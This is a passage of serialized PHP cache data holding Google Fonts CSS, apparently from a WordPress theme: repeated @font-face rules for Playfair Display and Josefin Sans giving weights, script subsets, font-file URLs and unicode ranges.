U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}\";}s:459:\"https://fonts.googleapis.com/css?family=Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic|Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic|ZCOOL+XiaoWei:regular|Josefin+Sans:100,200,300,regular,500,600,700,100italic,200italic,300italic,italic,500italic,600italic,700italic&subset=latin,latin-ext&display=swap_modern_ua\";a:1:{s:12:\"google-fonts\";s:523436:\"/* Original: https://fonts.googleapis.com/css?family=Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic|Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic|ZCOOL+XiaoWei:regular|Josefin+Sans:100,200,300,regular,500,600,700,100italic,200italic,300italic,italic,500italic,600italic,700italic&subset=latin,latin-ext&display=swap *//* User Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Mobile/15E148 Safari/604.1 *//* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHgOiJM6.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHgOiJM6.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHgOiJM6.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHgOiJM6.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHgOiJM6.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHgOiJM6.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHgOiJM6.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4Vn8sig.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4Vn8sig.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4Vn8sig.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4Vn8sig.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, 